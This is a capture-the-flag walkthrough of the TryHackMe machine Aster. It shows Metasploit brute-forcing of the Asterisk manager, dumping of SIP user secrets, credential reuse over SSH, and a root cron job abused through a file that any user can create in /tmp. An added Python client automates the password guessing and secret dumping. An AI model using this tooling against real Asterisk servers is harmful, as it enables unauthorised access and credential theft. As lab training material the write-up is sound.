
TryHackMe - Aster

 ·  ☕ 9 min read  ·  ✍️ sckull

Aster is a TryHackMe machine; this is the walkthrough for obtaining the user.txt and root.txt flags.

Machine Information

Title: Aster
Info: Hack my server dedicated for building communications applications.
Points: 110
Difficulty: Medium
Maker: stuxnet

NMAP

A full TCP port scan with nmap shows SSH (22), HTTP (80), h323q931 (1720), cisco-sccp (2000) and Asterisk Call Manager (5038) open. The question marks on 1720 and 2000 mean nmap only guessed those services from the port number and could not confirm them with a probe. The ports reported as filtered in the first pass came back closed in the service scan, so there is nothing else to work with.

# Nmap 7.80 scan initiated Fri Sep 25 15:53:12 2020 as: nmap -p- --min-rate 1000 -o allPorts aster.thm
Warning: 10.10.105.28 giving up on port because retransmission cap hit (10).
Nmap scan report for aster.thm (10.10.105.28)
Host is up (0.25s latency).
Not shown: 65508 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
1720/tcp  open     h323q931
2000/tcp  open     cisco-sccp
5038/tcp  open     unknown
8022/tcp  filtered oa-system
8766/tcp  filtered amcs
9765/tcp  filtered unknown
12914/tcp filtered unknown
12955/tcp filtered unknown
13827/tcp filtered unknown
23734/tcp filtered unknown
24689/tcp filtered unknown
31507/tcp filtered unknown
32749/tcp filtered unknown
35841/tcp filtered unknown
36268/tcp filtered unknown
37303/tcp filtered unknown
39769/tcp filtered unknown
43235/tcp filtered unknown
45589/tcp filtered unknown
46305/tcp filtered unknown
48045/tcp filtered unknown
56150/tcp filtered unknown
60407/tcp filtered unknown
63664/tcp filtered unknown
63871/tcp filtered unknown

# Nmap done at Fri Sep 25 15:55:14 2020 -- 1 IP address (1 host up) scanned in 122.08 seconds
# Nmap 7.80 scan initiated Fri Sep 25 15:57:39 2020 as: nmap -p22,80,1720,2000,5038,8022,8766,9765,12914,12955,13827,23734,24689,31507,32749,35841,36268,37303,39769,43235,45589,46305,48045,56150,60407,63664,63871 -sV -sC -o servicesAllPorts aster.thm
Nmap scan report for aster.thm (10.10.105.28)
Host is up (0.40s latency).

PORT      STATE  SERVICE     VERSION
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fe:e3:52:06:50:93:2e:3f:7a:aa:fc:69:dd:cd:14:a2 (RSA)
|   256 9c:4d:fd:a4:4e:18:ca:e2:c0:01:84:8c:d2:7a:51:f2 (ECDSA)
|_  256 c5:93:a6:0c:01:8a:68:63:d7:84:16:dc:2c:0a:96:1d (ED25519)
80/tcp    open   http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Aster CTF
1720/tcp  open   h323q931?
2000/tcp  open   cisco-sccp?
5038/tcp  open   asterisk    Asterisk Call Manager 5.0.2
8022/tcp  closed oa-system
8766/tcp  closed amcs
9765/tcp  closed unknown
12914/tcp closed unknown
12955/tcp closed unknown
13827/tcp closed unknown
23734/tcp closed unknown
24689/tcp closed unknown
31507/tcp closed unknown
32749/tcp closed unknown
35841/tcp closed unknown
36268/tcp closed unknown
37303/tcp closed unknown
39769/tcp closed unknown
43235/tcp closed unknown
45589/tcp closed unknown
46305/tcp closed unknown
48045/tcp closed unknown
56150/tcp closed unknown
60407/tcp closed unknown
63664/tcp closed unknown
63871/tcp closed unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 25 15:58:42 2020 -- 1 IP address (1 host up) scanned in 62.78 seconds

HTTP

On port 80 we find a web page that hands us a Python script. file identifies the download, output.pyc, as Python 2.7 bytecode:

kali@kali:~/thm/aster$ file output.pyc 
output.pyc: python 2.7 byte-compiled
kali@kali:~/thm/aster$

We used uncompyle6 to recover the source. Apart from the pyfiglet banner it only holds two hex-encoded strings; the random-looking variable names and the if 0: blocks are dead code left behind by an obfuscator.

# uncompyle6 version 3.7.3
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.8.2 (default, Apr  1 2020, 15:52:55) 
# [GCC 9.3.0]
# Embedded file name: ./output.py
# Compiled at: 2020-08-11 02:59:35
import pyfiglet
pyfiglet_var = pyfiglet.figlet_format('Hello!!')
oO00oOo = '476f6f64206a6f622c2075736572202261646d696e2220746865206f70656e20736f75726365206672616d65776f726b20666f72206275696c64696e6720636f6d6d756e69636174696f6e732c20696e7374616c6c656420696e20746865207365727665722e'
OOOo0 = bytes.fromhex(oO00oOo)
Oooo000o = OOOo0.decode('ASCII')
if 0:
    i1 * ii1IiI1i % OOooOOo / I11i / o0O / IiiIII111iI
Oo = '476f6f64206a6f622072657665727365722c20707974686f6e206973207665727920636f6f6c21476f6f64206a6f622072657665727365722c20707974686f6e206973207665727920636f6f6c21476f6f64206a6f622072657665727365722c20707974686f6e206973207665727920636f6f6c21'
I1Ii11I1Ii1i = bytes.fromhex(Oo)
Ooo = I1Ii11I1Ii1i.decode('ASCII')
if 0:
    iii1I1I / O00oOoOoO0o0O.O0oo0OO0 + Oo0ooO0oo0oO.I1i1iI1i - II
print pyfiglet_var
# okay decompiling output.pyc

One of the decoded messages names the user admin and says that an open-source framework for building communications is installed on the server, which, together with the banner nmap read on port 5038, points at Asterisk.

476f6f64206a6f622c2075736572202261646d696e2220746865206f70656e20736f75726365206672616d65776f726b20666f72206275696c64696e6720636f6d6d756e69636174696f6e732c20696e7374616c6c656420696e20746865207365727665722e: Good job, user "admin" the open source framework for building communications, installed in the server.

476f6f64206a6f622072657665727365722c20707974686f6e206973207665727920636f6f6c21476f6f64206a6f622072657665727365722c20707974686f6e206973207665727920636f6f6c21476f6f64206a6f622072657665727365722c20707974686f6e206973207665727920636f6f6c21: Good job reverser, python is very cool!Good job reverser, python is very cool!Good job reverser, python is very cool!

GOBUSTER

We ran gobuster for directories and files but found nothing beyond the site's static assets.

kali@kali:~/thm/aster$ gobuster dir -u http://aster.thm/ -w /usr/share/wordlists/dirb/common.txt -q -t 25 -x php,html,txt
/assets (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/index.html (Status: 200)
/server-status (Status: 403)

ASTERISK

Among the open ports is Asterisk Call Manager 5.0.2, the Asterisk Manager Interface (AMI): a plain-text TCP protocol on port 5038 that lets an authenticated client run CLI commands and receive events. While researching the service we found a post on pentesting it. We started with the Metasploit module auxiliary/voip/asterisk_login, which brute-forces the login; with the known username (admin) and the module's default password list it found the user's password within the first few guesses.

msf5 > use auxiliary/voip/asterisk_login
msf5 auxiliary(voip/asterisk_login) > set USERNAME admin
USERNAME => admin
msf5 auxiliary(voip/asterisk_login) > set rhosts aster.thm
rhosts => aster.thm
msf5 auxiliary(voip/asterisk_login) > show options 

Module options (auxiliary/voip/asterisk_login):

   Name              Current Setting                                                    Required  Description
   ----              ---------------                                                    --------  -----------
   BLANK_PASSWORDS   false                                                              no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                  yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                              no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                              no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                              no        Add all users in the current database to the list
   PASSWORD                                                                             no        A specific password to authenticate with
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt  no        The file that contains a list of probable passwords.
   RHOSTS            aster.thm                                                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             5038                                                               yes       The target port (TCP)
   STOP_ON_SUCCESS   true                                                              yes       Stop guessing when a credential works for a host
   THREADS           1                                                                  yes       The number of concurrent threads (max one per host)
   USERNAME          admin                                                              no        A specific username to authenticate as
   USERPASS_FILE                                                                        no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                              no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/unix_users.txt      no        The file that contains a list of probable users accounts.
   VERBOSE           true                                                               yes       Whether to print output for all attempts

msf5 auxiliary(voip/asterisk_login) > set stop_on_success true
stop_on_success => true
msf5 auxiliary(voip/asterisk_login) > 
msf5 auxiliary(voip/asterisk_login) > run

[*] 10.10.160.101:5038    - Initializing module...
[*] 10.10.160.101:5038    - 10.10.160.101:5038 - Trying user:'admin' with password:'admin'
[*] 10.10.160.101:5038    - 10.10.160.101:5038 - Trying user:'admin' with password:'123456'
[*] 10.10.160.101:5038    - 10.10.160.101:5038 - Trying user:'admin' with password:'12345'
[*] 10.10.160.101:5038    - 10.10.160.101:5038 - Trying user:'admin' with password:'123456789'
[*] 10.10.160.101:5038    - 10.10.160.101:5038 - Trying user:'admin' with password:'password'
[*] 10.10.160.101:5038    - 10.10.160.101:5038 - Trying user:'admin' with password:'iloveyou'
[*] 10.10.160.101:5038    - 10.10.160.101:5038 - Trying user:'admin' with password:'princess'
[*] 10.10.160.101:5038    - 10.10.160.101:5038 - Trying user:'admin' with password:'1234567'
[*] 10.10.160.101:5038    - 10.10.160.101:5038 - Trying user:'admin' with password:'12345678'
[+] 10.10.160.101:5038    - User: "admin" using pass: "[... REDACTED ...]" - can login on 10.10.160.101:5038!
[!] 10.10.160.101:5038    - No active DB -- Credential data will not be saved!
[*] aster.thm:5038        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(voip/asterisk_login) >

We then connect with telnet and authenticate by sending a Login action with the credentials. Note that the username and secret travel in clear text:

kali@kali:~/thm/aster$ telnet aster.thm 5038
Trying 10.10.160.101...
Connected to aster.thm.
Escape character is '^]'.
Asterisk Call Manager/5.0.2
Action: Login
Username: admin
Secret: [... REDACTED ...]

Response: Success
Message: Authentication accepted

Event: FullyBooted
Privilege: system,all
Uptime: 5368
LastReload: 5368
Status: Fully Booted

HARRY - USER

Through the manager we can run Asterisk CLI commands. sip show users lists the SIP users with their secrets and contexts, and harry's secret is right there. The same string works as his password over SSH, giving us a shell and the user.txt flag.

Action: command
Command:  sip show users

Response: Success
Message: Command output follows
Output: Username                   Secret           Accountcode      Def.Context      ACL  Forcerport
Output: 100                        100                               test             No   No        
Output: 101                        101                               test             No   No        
Output: harry                      [... REDACTED ...]                test             No   No        
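The three AMI steps above (the password guessing that the Metasploit module automates, the Login action typed over telnet, and the sip show users dump), written out as an added example; this is my code, not the write-up's and not Asterisk's. The packet format it implements (Key: value lines ended by a blank line, one Output: field per output line, an unsolicited FullyBooted event after login) is taken from the exchange shown above. The credentials, SIP table and wordlist are constructed, and FakeAmiHandler is a local stand-in so the script runs offline; to use the client against the real service call attack("aster.thm", 5038, "admin", WORDLIST) instead.

```python
import socket
import socketserver
import threading
# Constructed sample data for the local stand-in server; none of it is the machine's real data.
FAKE_MANAGER_USERS = {"admin": "letmein1"}
FAKE_SIP_USERS = [("100", "100"), ("101", "101"), ("harry", "h4rry-s1p")]
WORDLIST = ["admin", "123456", "password", "letmein1", "iloveyou"]

def encode_packet(fields):
    """An AMI packet is a run of 'Key: value' lines (CRLF) closed by an empty line."""
    return "".join(f"{k}: {v}\r\n" for k, v in fields) + "\r\n"

def decode_packet(raw):
    """Parse packet text into (key, value) pairs; 'Output' repeats, so keep a list, not a dict."""
    return [(k.strip(), v.strip()) for k, _, v in (line.partition(":") for line in raw.split("\r\n") if line)]

def parse_sip_users(output_lines):
    """Turn the 'sip show users' table into {username: secret} using the header's column offsets."""
    start, end = output_lines[0].index("Secret"), output_lines[0].index("Accountcode")
    return {row[:start].strip(): row[start:end].strip() for row in output_lines[1:] if row.strip()}

class AmiClient:
    """Minimal AMI client: one TCP session, packets read up to the blank-line terminator."""
    def __init__(self, host, port):
        self.sock = socket.create_connection((host, port), timeout=5)
        self.buf = b""
        self.banner = self._read_until(b"\r\n")  # "Asterisk Call Manager/5.0.2" on the real box
    def _read_until(self, marker):
        while marker not in self.buf:
            chunk = self.sock.recv(4096)
            if not chunk:
                raise ConnectionError("AMI peer closed the connection")
            self.buf += chunk
        data, self.buf = self.buf.split(marker, 1)
        return data.decode()

    def request(self, fields):
        """Send one action and return its Response, skipping unsolicited Events such as FullyBooted."""
        self.sock.sendall(encode_packet(fields).encode())
        while True:
            packet = decode_packet(self._read_until(b"\r\n\r\n"))
            if any(k == "Response" for k, _ in packet):
                return packet

    def login(self, username, secret):
        return dict(self.request([("Action", "Login"), ("Username", username), ("Secret", secret)])).get("Response") == "Success"
    def command(self, cli_command):
        """Run a CLI command; the 5.x manager returns each output line as its own 'Output:' field."""
        return [v for k, v in self.request([("Action", "Command"), ("Command", cli_command)]) if k == "Output"]

def attack(host, port, username, candidates):
    """Guess the manager secret with a fresh session per try (the manager drops it after a failed login), then dump SIP secrets."""
    for secret in candidates:
        client = AmiClient(host, port)
        try:
            if client.login(username, secret):
                return {"manager_secret": secret, "sip_users": parse_sip_users(client.command("sip show users"))}
        finally:
            client.sock.close()
    return None

class FakeAmiHandler(socketserver.StreamRequestHandler):
    """Stand-in manager interface scripted from the exchange above (constructed, not Asterisk itself)."""
    def _send(self, fields):
        self.wfile.write(encode_packet(fields).encode())
    def _read_action(self):
        raw = b""
        for line in iter(self.rfile.readline, b""):  # readline() returns b"" once the client is gone
            raw += line
            if line == b"\r\n":
                return dict(decode_packet(raw.decode()))
        return None

    def handle(self):
        self.wfile.write(b"Asterisk Call Manager/5.0.2\r\n")
        authed = False
        while (action := self._read_action()) is not None:
            if action.get("Action") == "Login":
                if FAKE_MANAGER_USERS.get(action.get("Username")) != action.get("Secret"):
                    self._send([("Response", "Error"), ("Message", "Authentication failed")])
                    return  # the real manager closes the session here
                authed = True
                self._send([("Response", "Success"), ("Message", "Authentication accepted")])
                self._send([("Event", "FullyBooted"), ("Privilege", "system,all"), ("Status", "Fully Booted")])
            elif authed and action.get("Action") == "Command" and action.get("Command") == "sip show users":
                table = [f"{'Username':<26} {'Secret':<16} {'Accountcode':<16} {'Def.Context':<16} ACL  Forcerport"]
                table += [f"{u:<26} {s:<16} {'':<16} {'test':<16} No   No" for u, s in FAKE_SIP_USERS]
                self._send([("Response", "Success"), ("Message", "Command output follows")] + [("Output", t) for t in table])
            else:
                self._send([("Response", "Error"), ("Message", "Permission denied")])

def start_fake_server():
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeAmiHandler)
    server.daemon_threads = True
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]

if __name__ == "__main__":
    server, port = start_fake_server()
    print(attack("127.0.0.1", port, "admin", WORDLIST))  # swap in ("aster.thm", 5038) for the real box
```

Two things the exchange makes obvious and the code has to live with: everything, secret included, crosses the wire in clear text, and nothing in the protocol slows repeated guesses, which is why nine attempts per host are cheap for the module. The client reconnects after each failed Login because the manager ends the session on failure, and request() has to skip Event packets because the FullyBooted event arrives unrequested right after a successful login.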


ROOT FLAG

In harry's home directory we find Example_Root.jar. Decompiling it with JavaDecompilers (Procyon) shows that the program checks whether /tmp/flag.dat exists and, if it does, writes the string my secret <3 baby to /home/harry/root.txt.

import java.io.IOException;
import java.io.FileWriter;
import java.io.File;

// 
// Decompiled by Procyon v0.5.36
// 

public class Example_Root
{
    public static boolean isFileExists(final File file) {
        return file.isFile();
    }
    
    public static void main(final String[] array) {
        final File file = new File("/tmp/flag.dat");
        try {
            if (isFileExists(file)) {
                final FileWriter fileWriter = new FileWriter("/home/harry/root.txt");
                fileWriter.write("my secret <3 baby");
                fileWriter.close();
                System.out.println("Successfully wrote to the file.");
            }
        }
        catch (IOException ex) {
            System.out.println("An error occurred.");
            ex.printStackTrace();
        }
    }
}

Enumerating the machine, we find two non-standard entries in /etc/crontab that run as root every minute:

harry@ubuntu:~$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
*  *	* * *	root	cd /opt/ && bash ufw.sh
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*  *	* * *	root	cd /root/java/ && bash run.sh
#

The first runs /opt/ufw.sh, which does nothing but disable the firewall (consistent with the ports that showed as filtered in the first scan and closed in the second). The second runs /root/java/run.sh, a script we cannot read as harry, which by its location presumably launches something written in Java. The contents of ufw.sh:

ufw disable

We use pspy to watch what the second cron job actually executes. It shows run.sh running java -jar root.jar from /root/java/.

If Example_Root.jar is only the example, root.jar is presumably the real thing: it most likely writes some string, plausibly the root.txt flag, to /home/harry/root.txt. The flaw is that a root process takes its trigger from /tmp, where any user can create the file, and then writes into a directory harry controls. To test this we create /tmp/flag.dat and wait for the next cron run:

touch /tmp/flag.dat

A minute later /home/harry/root.txt exists and holds the root.txt flag.
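The check behind the last few steps, written out as an added example (my code, not the write-up's): parse the system crontab format shown above, resolve the script each root job runs (following the cd on the same line, as both custom jobs here do) and report which of those scripts the current user could edit or replace. The crontab text is a constructed copy of the one above, the @reboot line and backup.sh are hypothetical additions to exercise the other cron syntax, and the writable-path set in the test is a stand-in for the real filesystem.

```python
import os
import re
import shlex

# Constructed crontab modelled on the one above (same six-field layout); the @reboot line is a hypothetical addition.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user\tcommand
17 *\t* * *\troot    cd / && run-parts --report /etc/cron.hourly
*  *\t* * *\troot\tcd /opt/ && bash ufw.sh
*  *\t* * *\troot\tcd /root/java/ && bash run.sh
@reboot\troot\t/usr/local/bin/backup.sh --full
"""

SCRIPT_SUFFIXES = (".sh", ".py", ".pl", ".rb", ".jar")

def parse_system_crontab(text):
    """(user, command) pairs from /etc/crontab or /etc/cron.d: five time fields (or one @keyword), then the user."""
    jobs = []
    for raw in text.splitlines():
        fields = raw.split()
        if not fields or fields[0].startswith("#") or "=" in fields[0]:
            continue  # blank line, comment, or SHELL=/PATH= assignment
        skip = 1 if fields[0].startswith("@") else 5
        if len(fields) > skip + 1:
            jobs.append((fields[skip], " ".join(fields[skip + 1:])))
    return jobs

def referenced_scripts(command):
    """Heuristic: resolve script-looking words to absolute paths, honouring a `cd` earlier on the same command line."""
    cwd, paths = "/", []
    for segment in re.split(r"&&|\|\||;", command):
        try:
            words = [w for w in shlex.split(segment) if w not in ("(", ")")]
        except ValueError:
            continue  # unbalanced quotes: skip rather than guess
        if not words:
            continue
        if words[0] == "cd":
            cwd = os.path.normpath(os.path.join(cwd, words[1])) if len(words) > 1 else "/"
            continue
        for word in words:
            if not word.startswith("-") and ("/" in word or word.endswith(SCRIPT_SUFFIXES)):
                paths.append(os.path.normpath(os.path.join(cwd, word)))
    return paths

def audit_root_jobs(jobs, writable=lambda p: os.access(p, os.W_OK)):
    """For each job that runs as root, report script paths the current user could edit or replace.
    `writable` is injected so the check can run against a fake filesystem in tests."""
    findings = []
    for user, command in jobs:
        if user != "root":
            continue
        for path in referenced_scripts(command):
            if writable(path):
                findings.append((command, path, "script is writable: edit it and wait for the next run"))
            elif writable(os.path.dirname(path)):
                findings.append((command, path, "parent directory is writable: the script can be replaced"))
    return findings

if __name__ == "__main__":
    with open("/etc/crontab") as fh:  # real run against the system crontab
        for finding in audit_root_jobs(parse_system_crontab(fh.read())):
            print(*finding, sep="\n    ")
```

This catches the classic writable-script case. The trigger on this box is different: root.jar reads /tmp/flag.dat, a path anyone can create, and that only shows up by decompiling the example or watching with pspy. The question to ask of every path a root job reads is the same one the audit asks of the scripts: can an unprivileged user create or change it?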


Written by sckull (Pentester wannabe)